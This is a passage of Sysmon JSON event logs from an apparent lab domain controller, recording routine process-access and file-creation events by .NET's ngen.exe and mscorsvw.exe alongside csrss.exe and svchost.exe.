{E2A3D6B1-1372-5F25-0000-0010BFD80E00}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.044","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-0010BFD80E00}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8389,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.091\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1364-5F25-0000-0010E56D0E00}\r\nTargetProcessId: 2464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.091","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1364-5F25-0000-0010E56D0E00}","TargetProcessId":"2464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8390,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.091\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1364-5F25-0000-0010E56D0E00}\r\nTargetProcessId: 2464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.091","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1364-5F25-0000-0010E56D0E00}","TargetProcessId":"2464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8391,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.091\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1364-5F25-0000-0010E56D0E00}\r\nTargetProcessId: 2464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.091","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1364-5F25-0000-0010E56D0E00}","TargetProcessId":"2464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8392,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:10.263\r\nProcessGuid: {E2A3D6B1-1372-5F25-0000-001012DC0E00}\r\nProcessId: 2464\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9a0-0\\System.Drawing.Design.dll\r\nCreationUtcTime: 2020-08-01 07:02:10.263","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:10.263","ProcessGuid":"{E2A3D6B1-1372-5F25-0000-001012DC0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9a0-0\\System.Drawing.Design.dll","CreationUtcTime":"2020-08-01 07:02:10.263","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8393,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.294\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-00102CE10E00}\r\nTargetProcessId: 4900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.294","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-00102CE10E00}","TargetProcessId":"4900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8394,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.294\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-00102CE10E00}\r\nTargetProcessId: 4900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.294","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-00102CE10E00}","TargetProcessId":"4900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8395,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.294\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-00102CE10E00}\r\nTargetProcessId: 4900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.294","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-00102CE10E00}","TargetProcessId":"4900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8396,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.357\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-00101FE50E00}\r\nTargetProcessId: 4228\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.357","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-00101FE50E00}","TargetProcessId":"4228","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\M